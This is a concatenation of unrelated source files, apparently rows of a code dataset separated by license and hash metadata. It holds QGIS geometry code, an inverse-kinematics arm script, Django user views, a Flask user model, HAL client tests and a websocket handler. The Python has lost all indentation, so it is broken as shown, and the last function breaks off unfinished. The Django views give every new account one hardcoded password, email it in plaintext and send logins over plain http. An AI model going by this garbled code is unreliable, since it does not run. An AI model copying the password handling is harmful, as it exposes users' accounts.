__copyright__ = '(C) 2016, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.core import (QgsProcessingParameterNumber,
QgsProcessingException,
QgsProcessing)
from processing.algs.qgis.QgisAlgorithm import QgisFeatureBasedAlgorithm
class ExtendLines(QgisFeatureBasedAlgorithm):
START_DISTANCE = 'START_DISTANCE'
END_DISTANCE = 'END_DISTANCE'
def group(self):
return self.tr('Vector geometry')
def __init__(self):
super().__init__()
self.start_distance = None
self.end_distance = None
def initParameters(self, config=None):
self.addParameter(QgsProcessingParameterNumber(self.START_DISTANCE,
self.tr('Start distance'), defaultValue=0.0))
self.addParameter(QgsProcessingParameterNumber(self.END_DISTANCE,
self.tr('End distance'), defaultValue=0.0))
def name(self):
return 'extendlines'
def displayName(self):
return self.tr('Extend lines')
def outputName(self):
return self.tr('Extended')
def inputLayerTypes(self):
return [QgsProcessing.TypeVectorLine]
def prepareAlgorithm(self, parameters, context, feedback):
self.start_distance = self.parameterAsDouble(parameters, self.START_DISTANCE, context)
self.end_distance = self.parameterAsDouble(parameters, self.END_DISTANCE, context)
return True
def processFeature(self, feature, context, feedback):
input_geometry = feature.geometry()
if input_geometry:
output_geometry = input_geometry.extendLine(self.start_distance, self.end_distance)
if not output_geometry:
raise QgsProcessingException(
self.tr('Error calculating extended line'))
feature.setGeometry(output_geometry)
return feature
| gpl-2.0 | 7,437,769,807,170,386,000 | 36.4375 | 100 | 0.535225 | false |
studywolf/blog | InvKin/Arm.py | 1 | 7959 | '''
Copyright (C) 2013 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import numpy as np
import scipy.optimize
class Arm3Link:
def __init__(self, q=None, q0=None, L=None):
"""Set up the basic parameters of the arm.
All lists are in order [shoulder, elbow, wrist].
q : np.array
the initial joint angles of the arm
q0 : np.array
the default (resting state) joint configuration
L : np.array
the arm segment lengths
"""
# initial joint angles
self.q = [.3, .3, 0] if q is None else q
# some default arm positions
self.q0 = np.array([np.pi/4, np.pi/4, np.pi/4]) if q0 is None else q0
# arm segment lengths
self.L = np.array([1, 1, 1]) if L is None else L
self.max_angles = [np.pi, np.pi, np.pi/4]
self.min_angles = [0, 0, -np.pi/4]
def get_xy(self, q=None):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
returns : list
the [x,y] position of the arm
"""
if q is None:
q = self.q
x = self.L[0]*np.cos(q[0]) + \
self.L[1]*np.cos(q[0]+q[1]) + \
self.L[2]*np.cos(np.sum(q))
y = self.L[0]*np.sin(q[0]) + \
self.L[1]*np.sin(q[0]+q[1]) + \
self.L[2]*np.sin(np.sum(q))
return [x, y]
def inv_kin(self, xy):
"""This is just a quick write up to find the inverse kinematics
for a 3-link arm, using the SciPy optimize package minimization
function.
Given an (x,y) position of the hand, return a set of joint angles (q)
using constraint based minimization, constraint is to match hand (x,y),
        minimize the distance of each joint from its default position (q0).
xy : tuple
the desired xy position of the arm
returns : list
the optimal [shoulder, elbow, wrist] angle configuration
"""
def distance_to_default(q, *args):
"""Objective function to minimize
Calculates the euclidean distance through joint space to the
default arm configuration. The weight list allows the penalty of
each joint being away from the resting position to be scaled
differently, such that the arm tries to stay closer to resting
state more for higher weighted joints than those with a lower
weight.
q : np.array
the list of current joint angles
returns : scalar
euclidean distance to the default arm position
"""
# weights found with trial and error,
# get some wrist bend, but not much
weight = [1, 1, 1.3]
return np.sqrt(np.sum([(qi - q0i)**2 * wi
for qi, q0i, wi in zip(q, self.q0, weight)]))
def x_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired x position
"""
x = (self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) +
self.L[2]*np.cos(np.sum(q))) - xy[0]
return x
def y_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired y position
"""
y = (self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) +
self.L[2]*np.sin(np.sum(q))) - xy[1]
return y
def joint_limits_upper_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return self.max_angles - q
def joint_limits_lower_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return q - self.min_angles
return scipy.optimize.fmin_slsqp(
func=distance_to_default,
x0=self.q,
eqcons=[x_constraint,
y_constraint],
# uncomment to add in min / max angles for the joints
# ieqcons=[joint_limits_upper_constraint,
# joint_limits_lower_constraint],
args=(xy,),
iprint=0) # iprint=0 suppresses output
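# A quick usage sketch (mirrors what test() below does for a single target):
#
#   arm = Arm3Link()
#   q = arm.inv_kin(xy=[0.5, 0.5])
#   print(arm.get_xy(q))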
def test():
# ###########Test it!##################
arm = Arm3Link()
# set of desired (x,y) hand positions
x = np.arange(-.75, .75, .05)
y = np.arange(.25, .75, .05)
# threshold for printing out information, to find trouble spots
thresh = .025
count = 0
total_error = 0
# test it across the range of specified x and y values
for xi in range(len(x)):
for yi in range(len(y)):
# test the inv_kin function on a range of different targets
xy = [x[xi], y[yi]]
# run the inv_kin function, get the optimal joint angles
q = arm.inv_kin(xy=xy)
# find the (x,y) position of the hand given these angles
actual_xy = arm.get_xy(q)
# calculate the root squared error
error = np.sqrt(np.sum((np.array(xy) - np.array(actual_xy))**2))
# total the error
total_error += np.nan_to_num(error)
# if the error was high, print out more information
if np.sum(error) > thresh:
print('-------------------------')
print('Initial joint angles', arm.q)
print('Final joint angles: ', q)
print('Desired hand position: ', xy)
print('Actual hand position: ', actual_xy)
print('Error: ', error)
print('-------------------------')
count += 1
print('\n---------Results---------')
print('Total number of trials: ', count)
print('Total error: ', total_error)
print('-------------------------')
if __name__ == '__main__':
test()
| gpl-3.0 | 4,691,724,446,632,460,000 | 34.373333 | 79 | 0.547305 | false |
Mansilla1/Sistema-SEC | apps/usuarios/views.py | 1 | 14404 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code developed by Daniel Mansilla
from django.shortcuts import render, render_to_response, redirect
from django.views.generic import ListView, CreateView, DetailView, DeleteView, UpdateView, TemplateView
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.core.urlresolvers import reverse_lazy
from django.core import serializers
from django.contrib.auth.models import User
from django.contrib.auth import login, logout
from django.utils import timezone
from django.template import RequestContext
# import django_excel as excel
from django.contrib import messages
from django.core.mail import send_mail
from django.conf import settings
import openpyxl
from openpyxl import Workbook
from openpyxl.styles import Font
from io import BytesIO
from Proyecto.utilities import generate_pdf
from random import randrange, uniform
import random
import requests
import ast
from django.db.models import Count
# from django.utils import simplejson
# import simplejson
from .forms import *
from .models import *
def login_user(request):
template_name = 'login/login.html'
logout(request)
username = password = ''
request.session['token'] = None
if request.POST:
post_data = {'username': request.POST["username"],'password':request.POST["password"]}
response = requests.post('http://cubesoa.asuscomm.com:90/rest-auth/login/', data=post_data)
content = response.content
content = ast.literal_eval(content)
if "key" in content:
post_data2 = {'username': str(request.POST["username"])}
header = {'Content-Type':'application/json','Authorization':'Token ' + content['key']}
response2 = requests.get('http://cubesoa.asuscomm.com:90/rest-auth/user/',headers=header, data=post_data2)
content2 = response2.content
content2 = ast.literal_eval(content2)
request.session["pk"] = content2['pk']
request.session["first_name"] = content2['first_name']
request.session["last_name"] = content2['last_name']
request.session["email"] = content2['email']
request.session["token"] = content['key']
return HttpResponseRedirect(reverse_lazy('inicio'))
# elif
# return redirect('inicio')
return render(request, template_name, {})
# def index(request):
# # perfil_user = PerfilUsuario.objects.get(user__id=request.user.id)
# # usuarios = PerfilUsuario.objects.all().count()
# # contenidos = ProfeSesion.objects.filter(status=True).count()
# # preguntas = Pregunta.objects.filter(status=True).count()
# # evaluaciones = Evaluacion.objects.filter(disponible=True).count()
# # usuario_registrados = PerfilUsuario.objects.all().order_by('created_at')[:5].reverse()
# # ------------------------------------------
# # OBTENER RANKINGS
# # ------------------------------------------
# user_pregunta = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(preguntas=Count('pregunta')).order_by('-preguntas')[:5]
# user_evaluacion = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(evaluaciones=Count('evaluacion')).order_by('-evaluaciones')[:5]
# orden_preguntas = Pregunta.objects.all().order_by('-cant_usada')[:5]
# context = {
# 'user_pregunta': user_pregunta,
# 'user_evaluacion': user_evaluacion,
# 'orden_preguntas': orden_preguntas,
# # 'perfil_user': perfil_user,
# # 'usuarios': usuarios,
# # 'preguntas': preguntas,
# # 'contenidos': contenidos,
# # 'evaluaciones': evaluaciones,
# # 'usuario_registrados': usuario_registrados,
# }
# return render(request, 'index.html', context)
def usuarioList(request):
usuario = PerfilUsuario.objects.all()
context = {
'usuario': usuario,
}
return render(request, 'apps/usuarios/usuario_list.html', context)
def usuarioCreate(request):
if request.POST:
form = PerfilForm(request.POST)
form2 = RegistroForm(request.POST)
if form.is_valid() and form2.is_valid():
form2 = form2.save(commit=False)
form2.save()
form = form.save(commit=False)
form.user = form2
form.save()
            # get the username
            user = form2.username
            nombre = form.nombres + ' ' + form.apellido1 + ' ' + form.apellido2
contrasena = 'unab2020'
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'Hola %s!\nusuario: %s, password: %s' % (nombre, user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
context = {
'form': form,
'form2': form2,
}
return render(request, 'apps/usuarios/usuario_create.html', context)
def usuarioUpdate(request, usuario_id):
# usuario = User.objects.get(id=usuario_id)
# id_user = int(usuario.id)
perfil = PerfilUsuario.objects.get(user=usuario_id)
if request.method == 'GET':
# form = RegistroForm(instance=usuario)
form = PerfilForm(instance=perfil)
else:
# form = RegistroForm(request.POST, instance=usuario)
form = PerfilForm(request.POST, instance=perfil)
if form.is_valid():
form.save()
# form2 = form2.save(commit=False)
# form2.user = usuario
# form2.save()
return redirect('usuarios:listar')
context = {
'form': form,
# 'form2': form2,
'perfil': perfil,
}
return render(request, 'apps/usuarios/usuario_update.html', context)
# class UsuarioDetail(DetailView):
# model = PerfilUsuario
# template_name = 'apps/usuarios/usuario_detail.html'
# context_object_name = 'usuario'
# def get_context_data(self, **kwargs):
# context = super(UsuarioDetail, self).get_context_data(**kwargs)
# context['title'] = 'Detalle de usuario'
# return context
def usuarioDelete(request, usuario_id):
usuario = User.objects.get(id=usuario_id)
if request.method == 'POST':
usuario.delete()
return redirect('usuarios:listar')
return render(request, 'apps/usuarios/usuario_delete.html', {'usuario':usuario})
#Planillas excel
def get_planilla_usuario(request):
    # generate the Excel workbook
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Usuarios'
# ws.font = ws.font.copy(bold=True, italic=True)
    # header row
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a6 = ws.cell(row=1, column=6, value='Usuario')
a7 = ws.cell(row=1, column=7, value='Tipo Usuario')
# a7 = ws.cell(row=1, column=7, value='¿Coordinador de asignatura? (si/no)')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
a6.font = Font(bold=True)
a7.font = Font(bold=True)
nombre_archivo = 'Planilla_usuarios.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
def upload(request):
if request.POST:
        # load the Excel workbook
        excel = request.FILES['archivo'].read()  # capture the uploaded file
        wb = openpyxl.load_workbook(filename=BytesIO(excel))  # open the workbook
        hojas = wb.get_sheet_names()  # sheet names in the file
        hoja = wb.get_sheet_by_name(hojas[0])  # use the first sheet of the document
        total_filas = hoja.max_row  # maximum number of rows to read
        total_columnas = hoja.max_column  # maximum number of columns
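        # Expected sheet layout (mirrors get_planilla_usuario above):
        # col1=RUN, col2=Nombres, col3=Apellido Paterno, col4=Apellido Materno,
        # col5=Email, col6=Usuario, col7=Tipo Usuario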
user_no_register = []
        # read/write loop
        for i in range(2, total_filas+1):
            form = PerfilForm()  # user profile form
            form2 = RegistroForm(request.POST or None)  # user registration form
# form3 = ProfesorForm()
# form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
            # check whether the user already exists
username = hoja.cell(row=i,column=6).value
print username
try:
usuario = User.objects.get(username=username)
usuario = usuario.username
                print 'user already exists'
user_no_register += [usuario]
except:
rut = hoja.cell(row=i,column=1).value
nombre = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
usuario = hoja.cell(row=i,column=6).value
tipo_usuario = hoja.cell(row=i,column=7).value
nombre = nombre.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
tipo_usuario = tipo_usuario.capitalize()
if tipo_usuario == 'Comité académico' or tipo_usuario == 'Comite académico' or tipo_usuario == 'Comité academico':
tipo_usuario = 'Comite academico'
print tipo_usuario
# numero_random = randrange(100,999)
# contrasena = "%s%s%s%s" % (nombre[0].capitalize(),numero_random, apellido[:2], numero_random)
contrasena = "unab2020"
# form2.set_password(self.cleaned_data["password1"])
# form2.set_password(self.cleaned_data["password2"])
form2 = form2.save(commit=False)
form2.username = usuario
# form2.first_name = nombre
# form2.last_name = apellido
# form2.email = correo
form2.password1 = contrasena
form2.password2 = contrasena
form2.save()
form = form.save(commit=False)
form.rut = rut
form.nombres = nombre
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.tipo_usuario = tipo_usuario
form.user = form2
form.save()
# if form.tipo_usuario == 'Docente':
# form3 = form3.save(commit=False)
# form3.usuario = form
# form3.save()
# # if coordinador=='si' or coordinador=='SI' or coordinador=='Si' or coordinador=='sI':
# # form3_2 = form3_2.save(commit=False)
# # form3_2.profesor = form
# # form3_2.save()
# elif form.tipo_usuario == 'Estudiante':
# form4 = form4.save(commit=False)
# form4.usuario = form
# form4.save()
                # get the username
                user = form2.username
nombre = "%s %s %s" %(form.nombres, form.apellido1, form.apellido2)
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'usuario: %s, password %s' % (user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
print user_no_register
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
# form3 = ProfesorForm()
# # form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
context = {
'form': form,
'form2': form2,
# 'form3': form3,
# # 'form3_2': form3_2,
# 'form4': form4,
}
return render(request, 'apps/usuarios/usuario_upload.html', context)
# ESTUDIANTES
def estudiante_list(request):
estudiantes = Estudiante.objects.all()
return render(request, 'apps/usuarios/estudiantes_list.html', {'estudiantes': estudiantes})
def estudiante_create(request):
if request.POST:
form = EstudianteForm(request.POST)
if form.is_valid():
form.save()
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {'form': form}
return render(request, 'apps/usuarios/estudiante_create.html', context)
def upload_estudiante(request):
if request.POST:
        # load the Excel workbook
        excel = request.FILES['archivo'].read()  # capture the uploaded file
        wb = openpyxl.load_workbook(filename=BytesIO(excel))  # open the workbook
        hojas = wb.get_sheet_names()  # sheet names in the file
        hoja = wb.get_sheet_by_name(hojas[0])  # use the first sheet of the document
        total_filas = hoja.max_row  # maximum number of rows to read
        total_columnas = hoja.max_column  # maximum number of columns
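        # Expected sheet layout (mirrors get_planilla_estudiante below):
        # col1=RUN, col2=Nombres, col3=Apellido Paterno, col4=Apellido Materno, col5=Email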
        estudiante_no_register = []
        # read/write loop
        for i in range(2, total_filas+1):
            form = EstudianteForm()  # student form
            # check whether the student already exists
rut = hoja.cell(row=i,column=1).value
try:
estudiante = Estudiante.objects.get(rut=rut)
                print 'student already exists'
estudiante_no_register += [estudiante]
except:
rut = hoja.cell(row=i,column=1).value
nombres = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
nombre2 = ''
nombre3 = ''
nombres = nombres.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
form = form.save(commit=False)
form.rut = rut
form.nombre1 = nombres
form.nombre2 = nombre2
form.nombre3 = nombre3
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.save()
print estudiante_no_register
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {
'form': form,
}
return render(request, 'apps/usuarios/estudiante_upload.html', context)
def get_planilla_estudiante(request):
    # generate the Excel workbook
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Estudiantes'
# ws.font = ws.font.copy(bold=True, italic=True)
    # header row
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
nombre_archivo = 'Planilla_estudiantes.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
# AJAX
class GetEstudiantes(TemplateView):
def get(self, request, *args, **kwargs):
estudiante = Estudiante.objects.all()
print estudiante
data = serializers.serialize('json', estudiante)
return HttpResponse(data, content_type="application/json") | apache-2.0 | 1,000,900,255,023,441,300 | 29.313684 | 156 | 0.682317 | false |
svenstaro/python-web-boilerplate | boilerplateapp/models/user.py | 1 | 2930 | """Module containing the `User` model."""
import uuid
import secrets
import string
from datetime import datetime
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy_utils.models import Timestamp
from flask import current_app
from boilerplateapp.extensions import db, passlib
class User(db.Model, Timestamp):
"""User model."""
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4)
email = db.Column(db.String(120), unique=True, nullable=False, index=True)
password_hash = db.Column(db.String(120), nullable=False)
current_auth_token = db.Column(db.String(32), index=True)
last_action = db.Column(db.DateTime)
def __init__(self, email, password):
"""Construct a `User`.
Accepts an `email` and a `password`. The password is securely hashed
before being written to the database.
"""
self.email = email
self.set_password(password)
def __repr__(self):
"""Format a `User` object."""
return '<User {email}>'.format(email=self.email)
def set_password(self, new_password):
"""Hash a given `new_password` and write it into the `User.password_hash` attribute.
        It does not add this change to the session, nor commit the transaction!
"""
self.password_hash = passlib.pwd_context.hash(new_password)
def verify_password(self, candidate_password):
"""Verify a given `candidate_password` against the password hash stored in the `User`.
Returns `True` if the password matches and `False` if it doesn't.
"""
return passlib.pwd_context.verify(candidate_password, self.password_hash)
def generate_auth_token(self):
"""Generate an auth token and save it to the `current_auth_token` column."""
alphabet = string.ascii_letters + string.digits
new_auth_token = ''.join(secrets.choice(alphabet) for i in range(32))
self.current_auth_token = new_auth_token
self.last_action = datetime.utcnow()
db.session.add(self)
db.session.commit()
return new_auth_token
@property
def has_valid_auth_token(self):
"""Return whether or not the user has a valid auth token."""
latest_valid_date = datetime.utcnow() - current_app.config['AUTH_TOKEN_TIMEOUT']
return (self.last_action and
self.last_action > latest_valid_date and
self.current_auth_token)
@staticmethod
def get_user_from_login_token(token):
"""Get a `User` from a login token.
A login token has this format:
<user uuid>:<auth token>
"""
user_id, auth_token = token.split(':')
user = db.session.query(User).get(user_id)
if user and user.current_auth_token:
if secrets.compare_digest(user.current_auth_token, auth_token):
return user
return None
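# Minimal usage sketch (assumes a request supplies `token` in the
# '<user uuid>:<auth token>' format described above):
#
#   user = User.get_user_from_login_token(token)
#   if user is not None and user.has_valid_auth_token:
#       pass  # authenticated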
| mit | 2,480,630,203,031,518,700 | 35.17284 | 94 | 0.646075 | false |
mattclarkdotnet/haleasy | test/test_haltalk.py | 1 | 4074 | from unittest import TestCase
from haleasy import HALEasy
import responses
class TestHaleasyHaltalk(TestCase):
haltalk_root = '''{
"_links": {
"self": {
"href":"/"
},
"curies": [
{
"name": "ht",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
}
],
"ht:users": {
"href":"/users"
},
"ht:signup": {
"href":"/signup"
},
"ht:me": {
"href": "/users/{name}",
"templated":true
},
"ht:latest-posts": {
"href":"/posts/latest"
}
},
"welcome": "Welcome to a haltalk server.",
"hint_1": "You need an account to post stuff..",
"hint_2": "Create one by POSTing via the ht:signup link..",
"hint_3": "Click the orange buttons on the right to make POST requests..",
"hint_4": "Click the green button to follow a link with a GET request..",
"hint_5": "Click the book icon to read docs for the link relation."
}'''
haltalk_get_user_aaa = '''{
"_links": {
"self": {
"href": "/users/aaa"
},
"curies": [
{
"name": "ht",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
},
{
"name": "bla",
"href": "http://haltalk.herokuapp.com/rels/{rel}",
"templated": true
}
],
"ht:posts": {
"href": "/users/aaa/posts"
}
},
"username": "aaa",
"bio": null,
"real_name": null
}'''
def setUp(self):
responses.reset()
responses.add(responses.GET, 'http://haltalk.herokuapp.com.test_domain/',
body=self.haltalk_root, status=200,
content_type='application/json')
responses.add(responses.POST, 'http://haltalk.herokuapp.com.test_domain/signup',
body='', status=201,
adding_headers={'Location': 'http://haltalk.herokuapp.com.test_domain/users/aaa'},
content_type='application/json')
responses.add(responses.GET, 'http://haltalk.herokuapp.com.test_domain/users/aaa',
body=self.haltalk_get_user_aaa, status=200,
content_type='application/json')
@responses.activate
def test_haltalk_root(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
self.assertEqual(h.link(rel=u'self')['href'], u'/')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/users')['href'], u'/users')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/me')['href'], u'/users/{name}')
self.assertEqual(h.link(rel=u'http://haltalk.herokuapp.com/rels/me')['templated'], True)
@responses.activate
def test_haltalk_root_with_curies(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
self.assertEqual(h.link(rel=u'self')['href'], u'/')
self.assertEqual(h.link(rel=u'ht:users')['href'], u'/users')
self.assertEqual(h.link(rel=u'ht:me')['href'], u'/users/{name}')
self.assertEqual(h.link(rel=u'ht:me')['templated'], True)
@responses.activate
def test_haltalk_create_user(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
user = h.link(rel='ht:signup').follow(method='POST', data={'username': 'aaa', 'password': 'bbb'})
self.assertEqual(user['username'], 'aaa')
@responses.activate
def test_haltalk_get_me_aaa(self):
h = HALEasy('http://haltalk.herokuapp.com.test_domain')
user = h.link(rel='ht:me').follow(name='aaa')
self.assertEqual(user['username'], 'aaa') | mit | 1,266,185,808,340,458,200 | 37.084112 | 105 | 0.500982 | false |
fdslight/fdslight | pywind/web/handlers/websocket.py | 1 | 8933 | #!/usr/bin/env python3
import pywind.evtframework.handlers.tcp_handler as tcp_handler
import pywind.web.lib.websocket as websocket
import pywind.web.lib.httputils as httputils
import socket, time
class ws_listener(tcp_handler.tcp_handler):
def init_func(self, creator, listen, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(listen)
return self.fileno
def after(self):
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
def tcp_accept(self):
while 1:
try:
cs, caddr = self.accept()
except BlockingIOError:
break
self.ws_accept(cs,caddr)
''''''
def ws_accept(self,cs,caddr):
"""重写这个方法
:param cs:客户端套接字对象
:param caddr:客户端地址
:return:
"""
pass
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def ws_release(self):
"""重写这个方法
:return:
"""
class ws_handler(tcp_handler.tcp_handler):
__conn_timeout = 60
__caddr = None
__encoder = None
__decoder = None
__is_handshake = None
__LOOP_TIMEOUT = 20
__update_time = 0
    # custom handshake response headers
__ext_handshake_resp_headers = None
__is_close = False
__is_sent_ping = False
def init_func(self, creator, cs, caddr):
self.__caddr = caddr
self.__decoder = websocket.decoder(server_side=True)
self.__encoder = websocket.encoder(server_side=True)
self.__is_handshake = False
self.__ext_handshake_resp_headers = []
self.__is_close = False
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.ws_init()
return self.fileno
def ws_init(self):
"""重写这个方法
:return:
"""
pass
@property
def caddr(self):
return self.__caddr
def response_error(self):
resp_sts = httputils.build_http1x_resp_header("400 Bad Request", [("Sec-WebSocket-Version", 13), ],
version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
self.delete_this_no_sent_data()
def __do_handshake(self, byte_data):
try:
sts = byte_data.decode("iso-8859-1")
except UnicodeDecodeError:
self.response_error()
return False
try:
rs = httputils.parse_htt1x_request_header(sts)
except:
self.response_error()
return False
req, headers = rs
dic = {}
for k, v in headers:
k = k.lower()
dic[k] = v
if "sec-websocket-key" not in dic: return False
ws_version = dic.get("sec-websocket-version", 0)
is_err = False
try:
ws_version = int(ws_version)
if ws_version != 13: is_err = True
except ValueError:
is_err = True
if is_err:
self.response_error()
return False
if not self.on_handshake(req, headers):
self.response_error()
return False
sec_ws_key = dic["sec-websocket-key"]
resp_sec_key = websocket.gen_handshake_key(sec_ws_key)
resp_headers = [("Upgrade", "websocket"), ("Connection", "Upgrade"), ("Sec-WebSocket-Accept", resp_sec_key)]
resp_headers += self.__ext_handshake_resp_headers
resp_sts = httputils.build_http1x_resp_header("101 Switching Protocols", resp_headers, version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
return True
def __handle_ping(self, message):
self.__send_pong(message)
def __handle_pong(self):
self.__is_sent_ping = False
self.__update_time = time.time()
def __handle_close(self):
if not self.__is_close:
self.ws_close()
return
self.delete_handler(self.fileno)
def __send_ping(self):
wrap_msg = self.__encoder.build_ping()
self.__is_sent_ping = True
self.__update_time = time.time()
self.writer.write(wrap_msg)
self.add_evt_write(self.fileno)
def __send_pong(self, message):
wrap_msg = self.__encoder.build_pong(message)
self.__update_time = time.time()
        self.writer.write(wrap_msg)
        self.add_evt_write(self.fileno)
def on_handshake(self, request, headers):
"""重写这个方法
:param request:
:param headers:
:return Boolean: False表示握手不允许,True表示握手允许
"""
return True
def set_handshake_resp_header(self, name, value):
"""设置额外的响应头
:param name:
:param value:
:return:
"""
self.__ext_handshake_resp_headers.append((name, value,))
def set_ws_timeout(self, timeout):
self.__conn_timeout = int(timeout)
if self.__conn_timeout < 1: raise ValueError("wrong timeout value")
def tcp_readable(self):
rdata = self.reader.read()
if not self.__is_handshake:
if not self.__do_handshake(rdata): return
self.__is_handshake = True
return
self.__decoder.input(rdata)
while self.__decoder.continue_parse():
self.__decoder.parse()
if not self.__decoder.can_read_data(): continue
data = self.__decoder.get_data()
self.__handle_readable(data, self.__decoder.fin, self.__decoder.rsv, self.__decoder.opcode,
self.__decoder.frame_ok())
if self.__decoder.frame_ok(): self.__decoder.reset()
self.__update_time = time.time()
return
def __handle_readable(self, message, fin, rsv, opcode, frame_finish):
"""
:param message:
:param fin:
:param rsv:
:param opcode:
:param frame_finish:
:return:
"""
if opcode == websocket.OP_CLOSE:
self.__handle_close()
return
if opcode == websocket.OP_PING:
self.__handle_ping(message)
return
if opcode == websocket.OP_PONG:
self.__handle_pong()
return
if not message: return
if message: self.ws_readable(message, fin, rsv, opcode, frame_finish)
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def tcp_timeout(self):
if not self.__is_handshake:
self.delete_handler(self.fileno)
return
t = time.time()
if t - self.__update_time >= self.__conn_timeout:
if self.__is_close or self.__is_sent_ping:
self.delete_handler(self.fileno)
return
self.__send_ping()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def sendmsg(self, msg, fin, rsv, opcode):
"""发送websocket消息
:param msg:
:return:
"""
if opcode in (0x8, 0x9, 0xa,): raise ValueError("ping,pong,close frame cannot be sent by this function")
